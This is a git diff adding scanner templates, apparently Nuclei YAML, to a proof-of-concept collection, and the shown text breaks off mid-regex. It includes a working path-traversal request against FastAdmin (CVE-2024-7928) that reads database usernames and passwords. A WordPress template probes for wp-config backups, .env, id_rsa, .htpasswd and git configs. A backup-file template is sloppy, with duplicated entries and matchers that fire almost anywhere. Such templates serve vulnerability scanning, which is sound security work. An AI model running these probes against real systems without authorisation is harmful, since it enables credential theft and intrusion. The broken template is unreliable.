diff --git a/date.txt b/date.txt index e99b9656d6..9a7f1aceb2 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241103 +20241104 diff --git a/poc.txt b/poc.txt index 8b2acb783e..fb151859e8 100644 --- a/poc.txt +++ b/poc.txt @@ -6860,6 +6860,7 @@ ./poc/backup/snapshot-backup-518ee5abfc5c619140ace18f02fca8ee.yaml ./poc/backup/snapshot-backup.yaml ./poc/backup/urbackup-panel.yaml +./poc/backup/vabro-backup-file-finder.yaml ./poc/backup/veeam-backup-azure-panel.yaml ./poc/backup/veeam-backup-gcp.yaml ./poc/backup/veritas-netbackup.yaml @@ -44564,6 +44565,7 @@ ./poc/cve/CVE-2024-7895.yaml ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml ./poc/cve/CVE-2024-7918.yaml +./poc/cve/CVE-2024-7928.yaml ./poc/cve/CVE-2024-7950-4a4c660d480c32376f512832d16b17e2.yaml ./poc/cve/CVE-2024-7950.yaml ./poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml @@ -57873,6 +57875,7 @@ ./poc/exposed/webpack-sourcemap-disclosure.yaml ./poc/exposed/wget-hsts-list-exposure.yaml ./poc/exposed/wordpress-config-disclosure.yaml +./poc/exposed/wordpress-exposure.yaml ./poc/exposed/wordpress-path-disclosure.yaml ./poc/exposed/wordpress-sensitive-config.yaml ./poc/exposed/wordpress-wp-config-exposure.yml @@ -112312,6 +112315,7 @@ ./poc/remote_code_execution/Typecho-Rce.yaml ./poc/remote_code_execution/VMware-CVE-2022-22954-RCE.yml ./poc/remote_code_execution/VOIPrce.yaml +./poc/remote_code_execution/Wifisky-7-RCE.yaml ./poc/remote_code_execution/Wordpress-Social_Warfare_Plugins-RCE.yaml ./poc/remote_code_execution/Wordpress-force_download_Plugins-FileDownload.yaml ./poc/remote_code_execution/YealinkPreauthrce.yaml @@ -131376,6 +131380,7 @@ ./poc/wordpress/wordpress-exit-box-lite-b885aa8757fedd66d898c12224efaf9e.yaml ./poc/wordpress/wordpress-exit-box-lite-e4f715486bc2f2be2ab66f9091e37d49.yaml ./poc/wordpress/wordpress-exit-box-lite.yaml +./poc/wordpress/wordpress-exposure.yaml ./poc/wordpress/wordpress-ext-adaptive-images-lfi.yaml ./poc/wordpress/wordpress-ext-adaptive-images-lfi.yml ./poc/wordpress/wordpress-ext-mailpress-rce.yaml diff --git a/poc/backup/vabro-backup-file-finder.yaml b/poc/backup/vabro-backup-file-finder.yaml new file mode 100644 index 0000000000..33d3ad98c6 --- /dev/null +++ b/poc/backup/vabro-backup-file-finder.yaml @@ -0,0 +1,140 @@ +id: backup-files +info: + name: Backup Files Finder (information disclosure) + author: Vabro + severity: High + description: | + This template checks for common backup file extensions that may have been left exposed on a target. + +requests: + - name: backup-files + path: + - "/backup" + - "/backups" + - "/root" + - "/www" + - "/public_html" + - "/ht_docs" + - "/files" + - "/images" + - "/assets" + - "/media" + - "/documents" + - "/resources" + - "/wp-content/uploads" + method: GET + matchers-condition: or + matchers: + - type: word + words: + - ".bak" + - ".old" + - ".zip" + - ".tar" + - ".tar.gz" + - ".tar.bz2" + - ".tar.xz" + - ".7z" + - ".rar" + - ".gz" + - ".bz2" + - ".xz" + - ".sql" + - ".db" + - ".bak" + - ".swp" + - ".swp" + - ".save" + - ".save" + - ".sav" + - ".sav" + - ".copy" + - ".copy" + - ".backup" + - ".backup" + - ".orig" + - ".orig" + - ".old" + - ".old" + - ".tmp" + - ".tmp" + - ".temp" + - ".temp" + - ".test" + - ".test" + - ".demo" + - ".demo" + - ".dev" + - ".dev" + - ".sample" + - ".sample" + - ".example" + - ".example" + - ".backup" + - ".backup" + - ".config" + - ".config" + - ".conf" + - ".conf" + - ".log" + - ".log" + - ".txt" + - ".txt" + - ".doc" + - ".doc" + - ".docx" + - ".xls" + - ".xlsx" + - ".ppt" + - ".pptx" + - ".pdf" + - ".csv" + - ".bak" + - ".bak" + - ".swp" + - ".swp" + - ".save" + - ".save" + - ".sav" + - ".sav" + - ".copy" + - ".copy" + - ".backup" + - ".backup" + - ".orig" + - ".orig" + - ".old" + - ".old" + - ".tmp" + - ".tmp" + - ".temp" + - ".temp" + - ".test" + - ".test" + - ".demo" + - ".demo" + - ".dev" + - ".dev" + - ".sample" + - ".sample" + - ".example" + - ".example" + - ".backup" + - ".backup" + - ".config" + - ".config" + - ".conf" + - ".conf" + - ".log" + - ".log" + - ".txt" + - ".txt" + - ".doc" + - ".doc" + - ".docx" + - ".xls" + - ".xlsx" + - ".ppt" + - ".pptx" + - ".pdf" + - ".csv" diff --git a/poc/cve/CVE-2024-7928.yaml b/poc/cve/CVE-2024-7928.yaml new file mode 100644 index 0000000000..2e5ec9d10a --- /dev/null +++ b/poc/cve/CVE-2024-7928.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-7928 + +info: + name: FastAdmin < V1.3.4.20220530 - Path Traversal + author: s4e-io + severity: medium + description: | + A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component. + reference: + - https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd + - https://github.com/bigb0x/CVE-2024-7928 + - https://nvd.nist.gov/vuln/detail/CVE-2024-7928 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7928 + cwe-id: CWE-22 + cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fastadmin + product: fastadmin + fofa-query: icon_hash="-1036943727" + tags: cve,cve2024,fastadmin,lfi + +http: + - raw: + - | + GET /index/ajax/lang?lang=../../application/database HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'jsonpReturn(' + - '"password":' + - '"username":' + - '"database":' + condition: and + + - type: word + part: content_type + words: + - 'application/javascript' + + - type: status + status: + - 200 +# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/wordpress-exposure.yaml b/poc/exposed/wordpress-exposure.yaml new file mode 100644 index 0000000000..f9b09655d6 --- /dev/null +++ b/poc/exposed/wordpress-exposure.yaml @@ -0,0 +1,84 @@ +id: wordpress-exposed-files + +info: + name: WordPress Exposed Sensitive Files Detection + author: Redflare-Cyber + severity: high + description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates. + tags: wordpress, exposure, creds, + +requests: + - method: GET + path: + - "{{BaseURL}}{{file}}" + + attack: clusterbomb + + payloads: + file: + - /wp-config.php{{suffix}} + - /backup{{suffix}} + - /database{{suffix}} + - /dump{{suffix}} + - /wp-config.php{{archive_ext}} + - /backup{{archive_ext}} + - /database{{archive_ext}} + - /dump{{archive_ext}} + - /wp-config-sample.php + - /.env + - /.git/config + - /.svn/entries + - /.hg/requires + - /.bzr/branch-format + - /.DS_Store + - /debug.log + - /error_log + - /phpinfo.php + - /composer.lock + - /composer.json + - /id_rsa + - /id_rsa.pub + - /.htpasswd + - /.htaccess + - /logs/access.log + - /logs/error.log + - /wp-content/debug.log + - /wp-content/uploads/.htaccess + - /wp-includes/php.ini + - /php.ini + - /info.php + suffix: + - '' + - '~' + - '.bak' + - '.old' + - '.save' + - '.swp' + - '.swo' + - '.sql' + archive_ext: + - '.zip' + - '.tar.gz' + - '.tar.bz2' + - '.tar' + - '.gz' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - 206 + + - type: regex + part: body + regex: + - '(?i)(DB_(NAME|USER|PASSWORD|HOST))' + - '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)' + - '(?i)(FTP_(USER|PASS))' + - '(?i)(